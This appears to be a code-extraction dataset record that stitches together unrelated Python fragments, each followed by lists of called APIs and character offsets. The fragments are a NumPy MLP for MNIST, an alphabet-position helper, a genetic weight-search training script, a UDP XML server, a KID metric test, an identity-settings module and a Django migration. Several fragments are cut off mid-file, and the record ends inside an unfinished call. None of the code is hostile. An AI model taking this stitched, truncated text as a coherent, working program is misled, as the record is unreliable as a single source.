elif type==2:
return (1/(1+np.exp(-x)))*(1-1/(1+np.exp(-x)))
else:
x[x<=0]=0.25
x[x>0]=1
return x
def activation_function(x,type):
if type==1:
return np.tanh(x)
elif type==2:
return 1/(1+np.exp(-x))
else:
return np.where(x<=0,0.25*x,x)
def MLP_train(data,labels,hidden_nodes,epoch,test_data,test_labels):
alpha=0.002
size=data.shape
w1=np.zeros((hidden_nodes,size[1]))
for i in range(hidden_nodes):
for j in range(size[1]):
w1[i,j]=random.uniform(-0.4,0.4)
w2=np.zeros((10,hidden_nodes))
for i in range(10):
for j in range(hidden_nodes):
w2[i,j]=random.uniform(-0.4,0.4)
b1=np.zeros(hidden_nodes)
b2=np.zeros(10)
for i in range(epoch):
for x,y in zip(data,labels):
u=np.dot(w1,x.T)+b1
h=activation_function(u,3)
v=np.dot(w2,h)+b2
output=activation_function(v,3)
delta2=(output-y.T)*der_activation_function(v,3)
delta1=der_activation_function(u,3)*np.dot(w2.T,delta2)
d_w1=np.dot(np.expand_dims(delta1,axis=1),np.expand_dims(x,axis=0))
d_w2=np.dot(np.expand_dims(delta2,axis=1),np.expand_dims(h,axis=0))
w1=w1-alpha*d_w1
w2=w2-alpha*d_w2
b1=b1-alpha*delta1
b2=b2-alpha*delta2
u_test=np.dot(w1,test_data.T)+np.expand_dims(b1,axis=1)
h_test=activation_function(u_test,3)
v_test=np.dot(w2,h_test)+np.expand_dims(b2,axis=1)
output_test=activation_function(v_test.T,3)
right_times=0
for i in range(len(output_test)):
if np.argmax(output_test[i])==np.argmax(test_labels[i]):
right_times+=1
accuracy=right_times/len(output_test)
print(accuracy)
if __name__=='__main__':
train_imgs=loadImage("train-images-idx3-ubyte")
train_labels=loadLabel("train-labels-idx1-ubyte")
test_imgs=loadImage("t10k-images-idx3-ubyte")
random.seed(2)
test_labels=loadLabel("t10k-labels-idx1-ubyte")
# MLP_train(train_imgs,train_labels,25,15,test_imgs,test_labels)
for nodes in range(30,60,10):
print('activation function: PReLU')
print(nodes,"hidden nodes:")
MLP_train(train_imgs, train_labels, nodes, 30, test_imgs, test_labels) | [
"random.uniform",
"numpy.where",
"load_data.loadImage",
"numpy.tanh",
"random.seed",
"numpy.argmax",
"numpy.exp",
"numpy.zeros",
"numpy.dot",
"numpy.expand_dims",
"load_data.loadLabel"
] | [((630, 663), 'numpy.zeros', 'np.zeros', (['(hidden_nodes, size[1])'], {}), '((hidden_nodes, size[1]))\n', (638, 663), True, 'import numpy as np\n'), ((782, 810), 'numpy.zeros', 'np.zeros', (['(10, hidden_nodes)'], {}), '((10, hidden_nodes))\n', (790, 810), True, 'import numpy as np\n'), ((924, 946), 'numpy.zeros', 'np.zeros', (['hidden_nodes'], {}), '(hidden_nodes)\n', (932, 946), True, 'import numpy as np\n'), ((954, 966), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (962, 966), True, 'import numpy as np\n'), ((2043, 2079), 'load_data.loadImage', 'loadImage', (['"""train-images-idx3-ubyte"""'], {}), "('train-images-idx3-ubyte')\n", (2052, 2079), False, 'from load_data import loadLabel, loadImage\n'), ((2097, 2133), 'load_data.loadLabel', 'loadLabel', (['"""train-labels-idx1-ubyte"""'], {}), "('train-labels-idx1-ubyte')\n", (2106, 2133), False, 'from load_data import loadLabel, loadImage\n'), ((2148, 2183), 'load_data.loadImage', 'loadImage', (['"""t10k-images-idx3-ubyte"""'], {}), "('t10k-images-idx3-ubyte')\n", (2157, 2183), False, 'from load_data import loadLabel, loadImage\n'), ((2188, 2202), 'random.seed', 'random.seed', (['(2)'], {}), '(2)\n', (2199, 2202), False, 'import random\n'), ((2219, 2254), 'load_data.loadLabel', 'loadLabel', (['"""t10k-labels-idx1-ubyte"""'], {}), "('t10k-labels-idx1-ubyte')\n", (2228, 2254), False, 'from load_data import loadLabel, loadImage\n'), ((407, 417), 'numpy.tanh', 'np.tanh', (['x'], {}), '(x)\n', (414, 417), True, 'import numpy as np\n'), ((1598, 1621), 'numpy.dot', 'np.dot', (['w1', 'test_data.T'], {}), '(w1, test_data.T)\n', (1604, 1621), True, 'import numpy as np\n'), ((1621, 1647), 'numpy.expand_dims', 'np.expand_dims', (['b1'], {'axis': '(1)'}), '(b1, axis=1)\n', (1635, 1647), True, 'import numpy as np\n'), ((1699, 1717), 'numpy.dot', 'np.dot', (['w2', 'h_test'], {}), '(w2, h_test)\n', (1705, 1717), True, 'import numpy as np\n'), ((1717, 1743), 'numpy.expand_dims', 'np.expand_dims', (['b2'], {'axis': '(1)'}), '(b2, axis=1)\n', (1731, 1743), True, 'import numpy as np\n'), ((493, 522), 'numpy.where', 'np.where', (['(x <= 0)', '(0.25 * x)', 'x'], {}), '(x <= 0, 0.25 * x, x)\n', (501, 522), True, 'import numpy as np\n'), ((750, 775), 'random.uniform', 'random.uniform', (['(-0.4)', '(0.4)'], {}), '(-0.4, 0.4)\n', (764, 775), False, 'import random\n'), ((892, 917), 'random.uniform', 'random.uniform', (['(-0.4)', '(0.4)'], {}), '(-0.4, 0.4)\n', (906, 917), False, 'import random\n'), ((1858, 1883), 'numpy.argmax', 'np.argmax', (['output_test[i]'], {}), '(output_test[i])\n', (1867, 1883), True, 'import numpy as np\n'), ((1885, 1910), 'numpy.argmax', 'np.argmax', (['test_labels[i]'], {}), '(test_labels[i])\n', (1894, 1910), True, 'import numpy as np\n'), ((189, 199), 'numpy.tanh', 'np.tanh', (['x'], {}), '(x)\n', (196, 199), True, 'import numpy as np\n'), ((1045, 1060), 'numpy.dot', 'np.dot', (['w1', 'x.T'], {}), '(w1, x.T)\n', (1051, 1060), True, 'import numpy as np\n'), ((1116, 1129), 'numpy.dot', 'np.dot', (['w2', 'h'], {}), '(w2, h)\n', (1122, 1129), True, 'import numpy as np\n'), ((1286, 1306), 'numpy.dot', 'np.dot', (['w2.T', 'delta2'], {}), '(w2.T, delta2)\n', (1292, 1306), True, 'import numpy as np\n'), ((1330, 1360), 'numpy.expand_dims', 'np.expand_dims', (['delta1'], {'axis': '(1)'}), '(delta1, axis=1)\n', (1344, 1360), True, 'import numpy as np\n'), ((1360, 1385), 'numpy.expand_dims', 'np.expand_dims', (['x'], {'axis': '(0)'}), '(x, axis=0)\n', (1374, 1385), True, 'import numpy as np\n'), ((1410, 1440), 'numpy.expand_dims', 'np.expand_dims', (['delta2'], {'axis': '(1)'}), '(delta2, axis=1)\n', (1424, 1440), True, 'import numpy as np\n'), ((1440, 1465), 'numpy.expand_dims', 'np.expand_dims', (['h'], {'axis': '(0)'}), '(h, axis=0)\n', (1454, 1465), True, 'import numpy as np\n'), ((456, 466), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (462, 466), True, 'import numpy as np\n'), ((243, 253), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (249, 253), True, 'import numpy as np\n'), ((264, 274), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (270, 274), True, 'import numpy as np\n')] |
import re
class AlphabetPosition:
alphabet = {
'a': 1,
'b': 2,
'c': 3,
'd': 4,
'e': 5,
'f': 6,
'g': 7,
'h': 8,
'i': 9,
'j': 10,
'k': 11,
'l': 12,
'm': 13,
'n': 14,
'o': 15,
'p': 16,
'q': 17,
'r': 18,
's': 19,
't': 20,
'u': 21,
'v': 22,
'w': 23,
'x': 24,
'y': 25,
'z': 26,
}
def find_position(self, sentence: str):
# Convert all letters to lowercase
sentence = sentence.lower()
# Remove all spaces and split sentence to list of chars
sentence = sentence.replace(" ", "")
# Extract only letters
characters = ''.join(re.findall("[a-zA-Z]+", sentence))
# Make string into list of characters
characters = list(characters)
# Initiate an empty list to save all positions of the characters in
positions = []
# Iterate through each character and find its position in the alphabet.
# once found replace the character with it's relevant position number
for character in characters:
positions.append(self.alphabet.get(character))
# Convert list of integers to single string
return ' '.join(map(str, positions))
| [
"re.findall"
] | [((786, 819), 're.findall', 're.findall', (['"""[a-zA-Z]+"""', 'sentence'], {}), "('[a-zA-Z]+', sentence)\n", (796, 819), False, 'import re\n')] |
from utils import (load_data, data_to_series_features,
apply_weight, is_minimum)
from algorithm import (initialize_weights, individual_to_key,
pop_to_weights, select, reconstruct_population)
from sklearn.metrics import mean_squared_error, mean_absolute_error
from tensorflow.keras import optimizers
from tensorflow.keras.models import clone_model
import argparse
import math
import numpy as np
from model import make_model
from copy import copy
from sklearn.model_selection import train_test_split
def parse_arguments():
# argument parsing
parser = argparse.ArgumentParser(description="Specify Params for Experimental Setting")
parser.add_argument('--iterations', type=int, default=20,
help="Specify the number of evolution iterations")
parser.add_argument('--batch_size', type=int, default=256,
help="Specify batch size")
parser.add_argument('--initial_epochs', type=int, default=100,
help="Specify the number of epochs for initial training")
parser.add_argument('--num_epochs', type=int, default=20,
help="Specify the number of epochs for competitive search")
parser.add_argument('--log_step', type=int, default=100,
help="Specify log step size for training")
parser.add_argument('--learning_rate', type=float, default=1e-3,
help="Learning rate")
parser.add_argument('--data', type=str, default='pollution.csv',
help="Path to the dataset")
parser.add_argument('--pop_size', type=int, default=36)
parser.add_argument('--code_length', type=int, default=6)
parser.add_argument('--n_select', type=int, default=6)
parser.add_argument('--time_steps', type=int, default=18)
parser.add_argument('--n_hidden', type=int, default=128)
parser.add_argument('--n_output', type=int, default=1)
parser.add_argument('--max_grad_norm', type=float, default=1.0)
return parser.parse_args()
def main():
args = parse_arguments()
data, y_scaler = load_data(args.data)
args.n_features = np.size(data, axis=-1)
X, y = data_to_series_features(data, args.time_steps)
train_X, X, train_y, y = train_test_split(X, y, test_size=0.3)
valid_X, test_X, valid_y, test_y = train_test_split(X, y, test_size=0.5)
optimizer = optimizers.Adam(learning_rate=args.learning_rate, clipnorm=args.max_grad_norm)
best_model = make_model(args)
best_weight = [1.0] * args.time_steps
best_model.compile(loss='mse', optimizer=optimizer)
print("Initial training before competitive random search")
best_model.fit(apply_weight(train_X, best_weight), train_y, epochs=args.initial_epochs,
validation_data=(apply_weight(valid_X, best_weight), valid_y), shuffle=True)
print("\nInitial training is done. Start competitive random search.\n")
pop, weights = initialize_weights(args.pop_size, args.time_steps, args.code_length)
key_to_rmse = {}
for iteration in range(args.iterations):
for enum, (indiv, weight) in enumerate(zip(pop, weights)):
print('iteration: [%d/%d] indiv_no: [%d/%d]' % (iteration + 1, args.iterations, enum + 1, args.pop_size))
key = individual_to_key(indiv)
if key not in key_to_rmse.keys():
model = make_model(args)
model.compile(loss='mse', optimizer=optimizer)
model.set_weights(best_model.get_weights())
model.fit(apply_weight(train_X, weight), train_y, epochs=args.num_epochs,
validation_data=(apply_weight(valid_X, weight), valid_y), shuffle=True)
pred_y = model.predict(apply_weight(valid_X, weight))
inv_pred_y = y_scaler.inverse_transform(pred_y)
inv_valid_y = y_scaler.inverse_transform(np.expand_dims(valid_y, axis=1))
rmse = math.sqrt(mean_squared_error(inv_valid_y, inv_pred_y))
mae = mean_absolute_error(inv_valid_y, inv_pred_y)
print("RMSE: %.4f, MAE: %.4f" % (rmse, mae))
if is_minimum(rmse, key_to_rmse):
best_model.set_weights(model.get_weights())
best_weight = copy(weight)
key_to_rmse[key] = rmse
pop_selected, fitness_selected = select(pop, args.n_select, key_to_rmse)
pop = reconstruct_population(pop_selected, args.pop_size)
weights = pop_to_weights(pop, args.time_steps, args.code_length)
print('test evaluation:')
pred_y = best_model.predict(apply_weight(test_X, best_weight))
inv_pred_y = y_scaler.inverse_transform(pred_y)
inv_test_y = y_scaler.inverse_transform(np.expand_dims(test_y, axis=1))
rmse = math.sqrt(mean_squared_error(inv_test_y, inv_pred_y))
mae = mean_absolute_error(inv_test_y, inv_pred_y)
print("RMSE: %.4f, MAE: %.4f" % (rmse, mae))
if __name__ == '__main__':
main()
| [
"utils.data_to_series_features",
"utils.is_minimum",
"utils.load_data",
"argparse.ArgumentParser",
"sklearn.model_selection.train_test_split",
"algorithm.initialize_weights",
"numpy.size",
"algorithm.individual_to_key",
"algorithm.pop_to_weights",
"model.make_model",
"algorithm.select",
"tenso... | [((601, 679), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Specify Params for Experimental Setting"""'}), "(description='Specify Params for Experimental Setting')\n", (624, 679), False, 'import argparse\n'), ((2118, 2138), 'utils.load_data', 'load_data', (['args.data'], {}), '(args.data)\n', (2127, 2138), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((2161, 2183), 'numpy.size', 'np.size', (['data'], {'axis': '(-1)'}), '(data, axis=-1)\n', (2168, 2183), True, 'import numpy as np\n'), ((2195, 2241), 'utils.data_to_series_features', 'data_to_series_features', (['data', 'args.time_steps'], {}), '(data, args.time_steps)\n', (2218, 2241), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((2271, 2308), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.3)'}), '(X, y, test_size=0.3)\n', (2287, 2308), False, 'from sklearn.model_selection import train_test_split\n'), ((2348, 2385), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.5)'}), '(X, y, test_size=0.5)\n', (2364, 2385), False, 'from sklearn.model_selection import train_test_split\n'), ((2403, 2481), 'tensorflow.keras.optimizers.Adam', 'optimizers.Adam', ([], {'learning_rate': 'args.learning_rate', 'clipnorm': 'args.max_grad_norm'}), '(learning_rate=args.learning_rate, clipnorm=args.max_grad_norm)\n', (2418, 2481), False, 'from tensorflow.keras import optimizers\n'), ((2499, 2515), 'model.make_model', 'make_model', (['args'], {}), '(args)\n', (2509, 2515), False, 'from model import make_model\n'), ((2961, 3029), 'algorithm.initialize_weights', 'initialize_weights', (['args.pop_size', 'args.time_steps', 'args.code_length'], {}), '(args.pop_size, args.time_steps, args.code_length)\n', (2979, 3029), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4875, 4918), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['inv_test_y', 'inv_pred_y'], {}), '(inv_test_y, inv_pred_y)\n', (4894, 4918), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((2696, 2730), 'utils.apply_weight', 'apply_weight', (['train_X', 'best_weight'], {}), '(train_X, best_weight)\n', (2708, 2730), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((4395, 4434), 'algorithm.select', 'select', (['pop', 'args.n_select', 'key_to_rmse'], {}), '(pop, args.n_select, key_to_rmse)\n', (4401, 4434), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4449, 4500), 'algorithm.reconstruct_population', 'reconstruct_population', (['pop_selected', 'args.pop_size'], {}), '(pop_selected, args.pop_size)\n', (4471, 4500), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4519, 4573), 'algorithm.pop_to_weights', 'pop_to_weights', (['pop', 'args.time_steps', 'args.code_length'], {}), '(pop, args.time_steps, args.code_length)\n', (4533, 4573), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((4637, 4670), 'utils.apply_weight', 'apply_weight', (['test_X', 'best_weight'], {}), '(test_X, best_weight)\n', (4649, 4670), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((4768, 4798), 'numpy.expand_dims', 'np.expand_dims', (['test_y'], {'axis': '(1)'}), '(test_y, axis=1)\n', (4782, 4798), True, 'import numpy as np\n'), ((4821, 4863), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['inv_test_y', 'inv_pred_y'], {}), '(inv_test_y, inv_pred_y)\n', (4839, 4863), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((3299, 3323), 'algorithm.individual_to_key', 'individual_to_key', (['indiv'], {}), '(indiv)\n', (3316, 3323), False, 'from algorithm import initialize_weights, individual_to_key, pop_to_weights, select, reconstruct_population\n'), ((2805, 2839), 'utils.apply_weight', 'apply_weight', (['valid_X', 'best_weight'], {}), '(valid_X, best_weight)\n', (2817, 2839), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3394, 3410), 'model.make_model', 'make_model', (['args'], {}), '(args)\n', (3404, 3410), False, 'from model import make_model\n'), ((4046, 4090), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['inv_valid_y', 'inv_pred_y'], {}), '(inv_valid_y, inv_pred_y)\n', (4065, 4090), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((4171, 4200), 'utils.is_minimum', 'is_minimum', (['rmse', 'key_to_rmse'], {}), '(rmse, key_to_rmse)\n', (4181, 4200), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3560, 3589), 'utils.apply_weight', 'apply_weight', (['train_X', 'weight'], {}), '(train_X, weight)\n', (3572, 3589), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3761, 3790), 'utils.apply_weight', 'apply_weight', (['valid_X', 'weight'], {}), '(valid_X, weight)\n', (3773, 3790), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n'), ((3913, 3944), 'numpy.expand_dims', 'np.expand_dims', (['valid_y'], {'axis': '(1)'}), '(valid_y, axis=1)\n', (3927, 3944), True, 'import numpy as np\n'), ((3979, 4022), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['inv_valid_y', 'inv_pred_y'], {}), '(inv_valid_y, inv_pred_y)\n', (3997, 4022), False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error\n'), ((4300, 4312), 'copy.copy', 'copy', (['weight'], {}), '(weight)\n', (4304, 4312), False, 'from copy import copy\n'), ((3667, 3696), 'utils.apply_weight', 'apply_weight', (['valid_X', 'weight'], {}), '(valid_X, weight)\n', (3679, 3696), False, 'from utils import load_data, data_to_series_features, apply_weight, is_minimum\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import socketserver
from lxml import etree
class UdpHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
print("{} wrote:".format(self.client_address[0]))
print(data)
self.server.decode_xml(data)
class UdpServer(socketserver.UDPServer):
def __init__(self, server_address, RequestHandlerClass):
socketserver.UDPServer.__init__(self, server_address,
RequestHandlerClass)
self.a = 1
def decode_xml(self, xml):
root = etree.fromstring(xml)
print(root.find('delta').text)
if __name__ == "__main__":
if len(sys.argv) > 1:
port = int(sys.argv[1])
else:
port = 9900
host = "localhost"
print("udp server listening on port {}".format(port))
server = UdpServer((host, port), UdpHandler)
server.serve_forever()
| [
"socketserver.UDPServer.__init__",
"lxml.etree.fromstring"
] | [((441, 515), 'socketserver.UDPServer.__init__', 'socketserver.UDPServer.__init__', (['self', 'server_address', 'RequestHandlerClass'], {}), '(self, server_address, RequestHandlerClass)\n', (472, 515), False, 'import socketserver\n'), ((622, 643), 'lxml.etree.fromstring', 'etree.fromstring', (['xml'], {}), '(xml)\n', (638, 643), False, 'from lxml import etree\n')] |
import os
import shutil
import tensorflow as tf
import torch
from torch_mimicry.metrics import compute_kid
from torch_mimicry.metrics.inception_model import inception_utils
from torch_mimicry.nets.gan import gan
class ExampleGen(gan.BaseGenerator):
def __init__(self,
bottom_width=4,
nz=4,
ngf=256,
loss_type='gan',
*args,
**kwargs):
super().__init__(nz=nz,
ngf=ngf,
bottom_width=bottom_width,
loss_type=loss_type,
*args,
**kwargs)
def forward(self, x):
output = torch.ones(x.shape[0], 3, 32, 32)
return output
class TestComputeKID:
def setup(self):
self.netG = ExampleGen()
self.num_subsets = 10
self.subset_size = 5
self.num_samples = self.subset_size * self.num_subsets
self.device = torch.device("cpu")
# Create inception graph once.
self.inception_path = './metrics/inception_model'
if not os.path.exists(self.inception_path):
os.makedirs(self.inception_path)
inception_utils.create_inception_graph(self.inception_path)
# Directory
self.log_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_log")
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
def test_compute_gen_dist_feat(self):
if self.device.index is not None:
# Avoid unbounded memory usage
gpu_options = tf.GPUOptions(allow_growth=True,
per_process_gpu_memory_fraction=0.15,
visible_device_list=str(
self.device.index))
config = tf.ConfigProto(gpu_options=gpu_options)
else:
config = tf.ConfigProto(device_count={'GPU': 0})
with tf.compat.v1.Session(config=config) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
fake_feat = compute_kid.compute_gen_dist_feat(
netG=self.netG,
num_samples=self.num_samples,
sess=sess,
seed=0,
device=self.device,
batch_size=10,
print_every=1)
assert fake_feat.shape == (self.num_samples, 2048)
def test_compute_real_dist_feat(self):
if self.device.index is not None:
# Avoid unbounded memory usage
gpu_options = tf.GPUOptions(allow_growth=True,
per_process_gpu_memory_fraction=0.15,
visible_device_list=str(
self.device.index))
config = tf.ConfigProto(gpu_options=gpu_options)
else:
config = tf.ConfigProto(device_count={'GPU': 0})
with tf.compat.v1.Session(config=config) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
real_feat = compute_kid.compute_real_dist_feat(
num_samples=self.num_samples,
sess=sess,
dataset_name='fake_data',
batch_size=10,
log_dir=self.log_dir)
print(real_feat.shape)
assert real_feat.shape == (self.num_samples, 2048)
def test_kid_score(self):
score, var = compute_kid.kid_score(num_subsets=self.num_subsets,
subset_size=self.subset_size,
netG=self.netG,
device=self.device,
dataset_name='fake_data',
batch_size=10,
log_dir=self.log_dir,
seed=0)
assert type(score) == float
assert type(var) == float
def teardown(self):
shutil.rmtree(self.log_dir)
del self.netG
if __name__ == "__main__":
test = TestComputeKID()
test.setup()
test.test_compute_gen_dist_feat()
test.test_compute_real_dist_feat()
test.test_kid_score()
test.teardown()
| [
"torch_mimicry.metrics.compute_kid.compute_gen_dist_feat",
"os.path.exists",
"torch.ones",
"os.makedirs",
"torch_mimicry.metrics.inception_model.inception_utils.create_inception_graph",
"torch_mimicry.metrics.compute_kid.kid_score",
"torch_mimicry.metrics.compute_kid.compute_real_dist_feat",
"shutil.r... | [((719, 752), 'torch.ones', 'torch.ones', (['x.shape[0]', '(3)', '(32)', '(32)'], {}), '(x.shape[0], 3, 32, 32)\n', (729, 752), False, 'import torch\n'), ((998, 1017), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1010, 1017), False, 'import torch\n'), ((1222, 1281), 'torch_mimicry.metrics.inception_model.inception_utils.create_inception_graph', 'inception_utils.create_inception_graph', (['self.inception_path'], {}), '(self.inception_path)\n', (1260, 1281), False, 'from torch_mimicry.metrics.inception_model import inception_utils\n'), ((3575, 3773), 'torch_mimicry.metrics.compute_kid.kid_score', 'compute_kid.kid_score', ([], {'num_subsets': 'self.num_subsets', 'subset_size': 'self.subset_size', 'netG': 'self.netG', 'device': 'self.device', 'dataset_name': '"""fake_data"""', 'batch_size': '(10)', 'log_dir': 'self.log_dir', 'seed': '(0)'}), "(num_subsets=self.num_subsets, subset_size=self.\n subset_size, netG=self.netG, device=self.device, dataset_name=\n 'fake_data', batch_size=10, log_dir=self.log_dir, seed=0)\n", (3596, 3773), False, 'from torch_mimicry.metrics import compute_kid\n'), ((4169, 4196), 'shutil.rmtree', 'shutil.rmtree', (['self.log_dir'], {}), '(self.log_dir)\n', (4182, 4196), False, 'import shutil\n'), ((1132, 1167), 'os.path.exists', 'os.path.exists', (['self.inception_path'], {}), '(self.inception_path)\n', (1146, 1167), False, 'import os\n'), ((1181, 1213), 'os.makedirs', 'os.makedirs', (['self.inception_path'], {}), '(self.inception_path)\n', (1192, 1213), False, 'import os\n'), ((1446, 1474), 'os.path.exists', 'os.path.exists', (['self.log_dir'], {}), '(self.log_dir)\n', (1460, 1474), False, 'import os\n'), ((1488, 1513), 'os.makedirs', 'os.makedirs', (['self.log_dir'], {}), '(self.log_dir)\n', (1499, 1513), False, 'import os\n'), ((1929, 1968), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'gpu_options': 'gpu_options'}), '(gpu_options=gpu_options)\n', (1943, 1968), True, 'import tensorflow as tf\n'), ((2005, 2044), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'device_count': "{'GPU': 0}"}), "(device_count={'GPU': 0})\n", (2019, 2044), True, 'import tensorflow as tf\n'), ((2059, 2094), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'config': 'config'}), '(config=config)\n', (2079, 2094), True, 'import tensorflow as tf\n'), ((2195, 2352), 'torch_mimicry.metrics.compute_kid.compute_gen_dist_feat', 'compute_kid.compute_gen_dist_feat', ([], {'netG': 'self.netG', 'num_samples': 'self.num_samples', 'sess': 'sess', 'seed': '(0)', 'device': 'self.device', 'batch_size': '(10)', 'print_every': '(1)'}), '(netG=self.netG, num_samples=self.\n num_samples, sess=sess, seed=0, device=self.device, batch_size=10,\n print_every=1)\n', (2228, 2352), False, 'from torch_mimicry.metrics import compute_kid\n'), ((2937, 2976), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'gpu_options': 'gpu_options'}), '(gpu_options=gpu_options)\n', (2951, 2976), True, 'import tensorflow as tf\n'), ((3013, 3052), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'device_count': "{'GPU': 0}"}), "(device_count={'GPU': 0})\n", (3027, 3052), True, 'import tensorflow as tf\n'), ((3067, 3102), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'config': 'config'}), '(config=config)\n', (3087, 3102), True, 'import tensorflow as tf\n'), ((3203, 3345), 'torch_mimicry.metrics.compute_kid.compute_real_dist_feat', 'compute_kid.compute_real_dist_feat', ([], {'num_samples': 'self.num_samples', 'sess': 'sess', 'dataset_name': '"""fake_data"""', 'batch_size': '(10)', 'log_dir': 'self.log_dir'}), "(num_samples=self.num_samples, sess=sess,\n dataset_name='fake_data', batch_size=10, log_dir=self.log_dir)\n", (3237, 3345), False, 'from torch_mimicry.metrics import compute_kid\n'), ((1355, 1380), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1370, 1380), False, 'import os\n'), ((2125, 2168), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (2166, 2168), True, 'import tensorflow as tf\n'), ((3133, 3176), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (3174, 3176), True, 'import tensorflow as tf\n')] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: identity
:platform: Unix
:synopsis: the top-level submodule of T_System's remote_ui that contains the functions for realizing identity process of T_System.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from t_system.administration import is_admin
from t_system import identifier
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
def get_identity_info(admin_id):
"""Method to get identity information of T_System.
Args:
admin_id (str): Root privileges flag.
"""
identity_info = {"public_id": identifier.public_id, "private_id": None, "name": identifier.name}
if admin_id:
if is_admin(admin_id):
identity_info["private_id"] = identifier.private_id
return identity_info
def update_identity(admin_id, cause, data):
"""Method to identity information of T_System as given parameters.
Args:
admin_id (str): Root privileges flag.
cause (str): Key that will be change.
data (dict): Identity data structure.
"""
result = True
root = is_admin(admin_id)
if cause:
if root:
if cause == "public_id":
identifier.change_keys(public_id=data["public_id"])
elif cause == "private_id":
identifier.change_keys(private_id=data["private_id"])
if cause == "name":
identifier.change_keys(name=data["name"])
else:
result = False
else:
if root:
result = identifier.change_keys(data["public_id"], data["private_id"], data["name"])
else:
result = identifier.change_keys(name=data["name"])
return result
| [
"t_system.log_manager.get_logger",
"t_system.identifier.change_keys",
"t_system.administration.is_admin"
] | [((386, 427), 't_system.log_manager.get_logger', 'log_manager.get_logger', (['__name__', '"""DEBUG"""'], {}), "(__name__, 'DEBUG')\n", (408, 427), False, 'from t_system import log_manager\n'), ((1197, 1215), 't_system.administration.is_admin', 'is_admin', (['admin_id'], {}), '(admin_id)\n', (1205, 1215), False, 'from t_system.administration import is_admin\n'), ((729, 747), 't_system.administration.is_admin', 'is_admin', (['admin_id'], {}), '(admin_id)\n', (737, 747), False, 'from t_system.administration import is_admin\n'), ((1503, 1544), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'name': "data['name']"}), "(name=data['name'])\n", (1525, 1544), False, 'from t_system import identifier\n'), ((1634, 1709), 't_system.identifier.change_keys', 'identifier.change_keys', (["data['public_id']", "data['private_id']", "data['name']"], {}), "(data['public_id'], data['private_id'], data['name'])\n", (1656, 1709), False, 'from t_system import identifier\n'), ((1745, 1786), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'name': "data['name']"}), "(name=data['name'])\n", (1767, 1786), False, 'from t_system import identifier\n'), ((1301, 1352), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'public_id': "data['public_id']"}), "(public_id=data['public_id'])\n", (1323, 1352), False, 'from t_system import identifier\n'), ((1409, 1462), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'private_id': "data['private_id']"}), "(private_id=data['private_id'])\n", (1431, 1462), False, 'from t_system import identifier\n')] |
# Generated by Django 3.2.12 on 2022-04-12 14:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("product", "0167_digitalcontenturl_order_line_token"),
("order", "0140_alter_orderline_old_id_and_created_at"),
]
operations = [
migrations.RunSQL(
"""
UPDATE product_digitalcontenturl
SET order_line_token = (
SELECT token
FROM order_orderline
WHERE product_digitalcontenturl.line_id = order_orderline.id
)
WHERE line_id IS NOT NULL;
""",
reverse_sql=migrations.RunSQL.noop,
),
]
| [
"django.db.migrations.RunSQL"
